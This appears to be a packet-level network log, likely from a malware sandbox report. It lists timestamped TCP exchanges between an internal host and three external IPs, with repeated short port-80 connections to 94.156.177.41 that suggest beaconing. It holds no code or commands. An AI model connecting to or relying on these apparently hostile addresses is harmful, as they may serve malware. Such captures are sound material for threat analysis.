Nov 21, 2024 01:20:48.337135077 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337155104 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337176085 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337189913 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337228060 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337228060 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337234020 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337268114 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337294102 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337302923 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337311983 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337337017 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337357044 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337373972 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337390900 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337409019 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337429047 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337443113 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337466002 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337476969 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337491035 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337512970 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337536097 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337542057 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337559938 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337598085 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337685108 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337713957 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337747097 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337748051 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337764978 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337785959 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337805986 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337820053 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337842941 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337853909 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337866068 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337889910 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337912083 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337923050 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337958097 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337970018 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337970018 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337992907 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338021040 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338028908 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338063002 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338064909 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338080883 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338104010 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338118076 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338139057 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338155985 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338171959 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338187933 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338207006 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338222027 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338243008 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338255882 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338277102 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338293076 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338311911 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338337898 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338346004 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338361979 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338380098 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338402987 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338413954 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338444948 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338449001 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338463068 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338485003 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338504076 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338519096 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338542938 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338553905 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338572025 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338588953 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338610888 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338623047 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338635921 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338658094 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338679075 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338691950 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338705063 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338727951 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338732004 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338752031 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338764906 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.338779926 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.338818073 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.460012913 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.460114956 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.460164070 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.460201025 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.460220098 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.460252047 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.460306883 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.460498095 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.460855961 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.460890055 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.460922003 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.460938931 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.461174965 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.461236954 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:51.902072906 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:51.902164936 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:21:00.640898943 CET	49166	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:00.640947104 CET	443	49166	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:00.641009092 CET	49166	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:00.642257929 CET	49166	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:00.642268896 CET	443	49166	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:00.804627895 CET	49167	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:00.924226999 CET	80	49167	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:00.924308062 CET	49167	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:00.927619934 CET	49167	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:01.047136068 CET	80	49167	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:01.047198057 CET	49167	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:01.166723967 CET	80	49167	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:02.012375116 CET	443	49166	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:02.012463093 CET	49166	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:02.014041901 CET	49166	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:02.014053106 CET	443	49166	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:02.019426107 CET	49166	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:02.019438982 CET	443	49166	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:02.418904066 CET	80	49167	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:02.418988943 CET	80	49167	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:02.419043064 CET	49167	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:02.419317007 CET	49167	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:02.524806023 CET	443	49166	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:02.524905920 CET	49166	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:02.524933100 CET	443	49166	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:02.524976969 CET	49166	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:02.525041103 CET	443	49166	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:02.525085926 CET	49166	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:02.531596899 CET	49166	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:02.531624079 CET	443	49166	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:02.538779020 CET	80	49167	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:03.532008886 CET	49168	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:03.651921988 CET	80	49168	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:03.652123928 CET	49168	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:03.680485010 CET	49168	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:03.800101995 CET	80	49168	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:03.800167084 CET	49168	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:03.919742107 CET	80	49168	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:05.118262053 CET	49169	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:05.118326902 CET	443	49169	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:05.118391037 CET	49169	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:05.120871067 CET	49170	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:05.120917082 CET	443	49170	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:05.120970964 CET	49170	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:05.150127888 CET	49171	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:21:05.159075022 CET	49170	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:05.159128904 CET	443	49170	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:05.159235001 CET	49169	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:05.159271955 CET	443	49169	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:05.204158068 CET	80	49168	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:05.204180002 CET	80	49168	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:05.204232931 CET	49168	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:05.204962969 CET	49168	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:05.269820929 CET	80	49171	192.3.243.136	192.168.2.22
Nov 21, 2024 01:21:05.269915104 CET	49171	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:21:05.324471951 CET	80	49168	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:05.422019958 CET	49172	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:05.541573048 CET	80	49172	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:05.541652918 CET	49172	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:05.572350025 CET	49172	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:05.691919088 CET	80	49172	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:05.691982031 CET	49172	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:05.811642885 CET	80	49172	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:06.532814026 CET	443	49169	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:06.532988071 CET	49169	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:06.571530104 CET	443	49170	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:06.571767092 CET	49170	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:06.840651035 CET	49170	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:06.840734959 CET	443	49170	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:06.841063976 CET	443	49170	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:06.841124058 CET	49170	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:06.869641066 CET	49169	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:06.869687080 CET	443	49169	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:06.870819092 CET	443	49169	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:06.870893002 CET	49169	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:07.076143980 CET	49170	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:07.116107941 CET	80	49172	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:07.116174936 CET	80	49172	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:07.116231918 CET	49172	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:07.121594906 CET	49172	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:07.123332024 CET	443	49170	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:07.241319895 CET	80	49172	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:07.270154953 CET	49173	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:07.321429968 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:21:07.390913963 CET	80	49173	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:07.390996933 CET	49173	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:07.397494078 CET	49173	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:07.473836899 CET	443	49170	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:07.473917961 CET	443	49170	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:07.473915100 CET	49170	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:07.473989010 CET	49170	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:07.486903906 CET	49170	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:07.486943007 CET	443	49170	198.244.140.41	192.168.2.22
Nov 21, 2024 01:21:07.489490986 CET	49171	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:21:07.518106937 CET	80	49173	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:07.518235922 CET	49173	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:07.609091997 CET	80	49171	192.3.243.136	192.168.2.22
Nov 21, 2024 01:21:07.637937069 CET	80	49173	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:08.064347982 CET	80	49171	192.3.243.136	192.168.2.22
Nov 21, 2024 01:21:08.066236019 CET	49171	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:21:09.249010086 CET	80	49173	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:09.249073029 CET	80	49173	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:09.249159098 CET	49173	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:09.249209881 CET	49173	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:09.369303942 CET	80	49173	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:09.761847973 CET	49174	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:09.882848978 CET	80	49174	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:09.882955074 CET	49174	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:09.884682894 CET	49174	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:10.006261110 CET	80	49174	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:10.006433010 CET	49174	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:10.126125097 CET	80	49174	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:11.401561975 CET	80	49174	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:11.401861906 CET	80	49174	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:11.401974916 CET	49174	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:11.414851904 CET	49174	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:11.534454107 CET	80	49174	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:11.727365017 CET	49175	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:11.847071886 CET	80	49175	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:11.847193956 CET	49175	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:11.866086960 CET	49175	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:11.985716105 CET	80	49175	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:11.985822916 CET	49175	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:12.105401993 CET	80	49175	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:12.951693058 CET	80	49171	192.3.243.136	192.168.2.22
Nov 21, 2024 01:21:12.951807022 CET	49171	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:21:13.380825043 CET	80	49175	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:13.380884886 CET	80	49175	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:13.382067919 CET	49175	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:13.382118940 CET	49175	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:13.501725912 CET	80	49175	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:13.608352900 CET	49176	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:13.727984905 CET	80	49176	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:13.728081942 CET	49176	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:13.730773926 CET	49176	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:13.850342989 CET	80	49176	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:13.850406885 CET	49176	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:13.970112085 CET	80	49176	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:14.295284986 CET	49171	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:21:14.295398951 CET	49169	443	192.168.2.22	198.244.140.41
Nov 21, 2024 01:21:15.243304968 CET	80	49176	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:15.243376017 CET	80	49176	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:15.243442059 CET	49176	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:15.243496895 CET	49176	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:15.363233089 CET	80	49176	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:15.382917881 CET	49177	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:15.502813101 CET	80	49177	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:15.502932072 CET	49177	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:15.504970074 CET	49177	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:15.624763966 CET	80	49177	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:15.628174067 CET	49177	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:15.748055935 CET	80	49177	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:17.082302094 CET	80	49177	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:17.082334042 CET	80	49177	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:17.082376957 CET	49177	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:17.082413912 CET	49177	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:17.202425003 CET	80	49177	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:17.502059937 CET	49178	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:17.621871948 CET	80	49178	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:17.621968031 CET	49178	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:17.624038935 CET	49178	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:17.743621111 CET	80	49178	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:17.743709087 CET	49178	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:17.863369942 CET	80	49178	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:19.199143887 CET	80	49178	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:19.199177027 CET	80	49178	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:19.199415922 CET	49178	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:19.226834059 CET	49178	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:19.346508980 CET	80	49178	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:19.789608955 CET	49179	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:19.909404993 CET	80	49179	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:19.909544945 CET	49179	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:19.929555893 CET	49179	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:20.049196959 CET	80	49179	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:20.049266100 CET	49179	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:20.168817997 CET	80	49179	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:21.471924067 CET	80	49179	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:21.472141981 CET	80	49179	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:21.472227097 CET	49179	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:21.504067898 CET	49179	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:21.623707056 CET	80	49179	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:21.664926052 CET	49180	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:21.785409927 CET	80	49180	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:21.785943985 CET	49180	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:21.787765026 CET	49180	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:21.907464027 CET	80	49180	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:21.907578945 CET	49180	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:22.027486086 CET	80	49180	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:23.365457058 CET	80	49180	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:23.365586042 CET	49180	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:23.365637064 CET	80	49180	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:23.365684032 CET	49180	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:23.485202074 CET	80	49180	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:23.501899004 CET	49181	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:23.621551991 CET	80	49181	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:23.621632099 CET	49181	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:23.623265028 CET	49181	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:23.742887974 CET	80	49181	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:23.743036985 CET	49181	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:23.862708092 CET	80	49181	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:25.118063927 CET	80	49181	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:25.118268967 CET	80	49181	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:25.118418932 CET	49181	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:25.118418932 CET	49181	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:25.238192081 CET	80	49181	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:25.245788097 CET	49182	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:25.365326881 CET	80	49182	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:25.365545988 CET	49182	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:25.366930962 CET	49182	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:25.486433983 CET	80	49182	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:25.486576080 CET	49182	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:25.606364965 CET	80	49182	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:26.718843937 CET	80	49182	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:26.718913078 CET	80	49182	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:26.719110966 CET	49182	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:26.719145060 CET	49182	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:26.838661909 CET	80	49182	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:26.856811047 CET	49183	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:26.976459026 CET	80	49183	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:26.976557970 CET	49183	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:26.978240967 CET	49183	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:27.097999096 CET	80	49183	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:27.098177910 CET	49183	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:27.217817068 CET	80	49183	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:28.558785915 CET	80	49183	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:28.558871984 CET	80	49183	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:28.558962107 CET	49183	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:28.558962107 CET	49183	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:28.679060936 CET	80	49183	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:28.777695894 CET	49184	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:28.897367001 CET	80	49184	94.156.177.41	192.168.2.22
Nov 21, 2024 01:21:28.897450924 CET	49184	80	192.168.2.22	94.156.177.41
Nov 21, 2024 01:21:28.899151087 CET	49184	80	192.168.2.22	94.156.177.41
